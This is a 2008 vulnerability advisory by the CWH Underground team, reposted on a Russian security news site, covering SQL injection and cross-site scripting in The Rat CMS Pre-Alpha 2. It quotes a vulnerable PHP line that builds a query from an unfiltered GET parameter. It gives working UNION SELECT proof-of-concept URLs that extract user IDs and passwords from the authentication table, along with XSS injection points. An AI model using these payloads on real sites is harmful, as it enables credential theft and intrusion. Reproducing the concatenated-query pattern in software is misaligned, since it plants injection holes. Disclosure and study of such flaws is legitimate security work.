Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  Multiple vulnerabilities in TietoEnator's Procapita school administration system, at least version "842 Procapita 840SP1"

  [ECHO_ADV_99$2008] Relative Real Estate Systems <= 3.0 (listing_id) Sql Injection Vulnerability

  RSS-aggregator (display) Remote File Inclusion Vulnerability

  IdeBox (include) Remote File Inclusion Vulnerability

From:tan_prathan_(at)_hotmail.com <tan_prathan_(at)_hotmail.com>
Date:26 июня 2008 г.
Subject:The Rat CMS (SQL/XSS) Multiple Remote Vulnerabilities

==========================================================
 The Rat CMS (SQL/XSS) Multiple Remote Vulnerabilities
==========================================================

 ,--^----------,--------,-----,-------^--,
 | |||||||||   `--------'     |          O     .. CWH Underground Hacking Team ..
 `+---------------------------^----------|
   `\_,-------, _________________________|
     / XXXXXX /`|     /
    / XXXXXX /  `\   /
   / XXXXXX /\______(
  / XXXXXX /           
 / XXXXXX /
(________(             
 `------'


AUTHOR : CWH Underground
DATE   : 25 June 2008
SITE   : cwh.citec.us


#####################################################
APPLICATION : The Rat CMS
VERSION     : Pre-Alpha 2
VENDOR      : N/A
DOWNLOAD    : http://downloads.sourceforge.net/the-rat-cms
#####################################################

--- Remote SQL Injection ---

---------------------------------------
Vulnerable File [viewarticle.php?id=]
---------------------------------------

@Line 5

  73:  $query = "SELECT title, content FROM news WHERE id=".$_GET['id'];
  74:  $result = mysql_query($query) or die('Error : ' . mysql_error());
  75:  $row = mysql_fetch_array($result, MYSQL_ASSOC);


---------
Exploit
---------

[+] http://[Target]/[trcms_path]/viewarticle.php?id=[SQL Injection]
[+] http://[Target]/[trcms_path]/viewarticle2.php?id=[SQL Injection]


-------------
POC Exploit
-------------

http://192.168.24.25/trcms/viewarticle.php?id=-9999/**/UNION/**/SELECT/**/user_id
,user_password/**/FROM/**/tbl_auth_user--
http://192.168.24.25/trcms/viewarticle2.php?id=-9999/**/UNION/**/SELECT/**/user_i
d,user_password/**/FROM/**/tbl_auth_user--


--- Remote XSS ---

---------
Exploit
---------

[+] http://[Target]/[trcms_path]/viewarticle.php/<XSS>
[+] http://[Target]/[trcms_path]/viewarticle.php?id=<XSS>
[+] http://[Target]/[trcms_path]/viewarticle2.php?id=<XSS>

##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород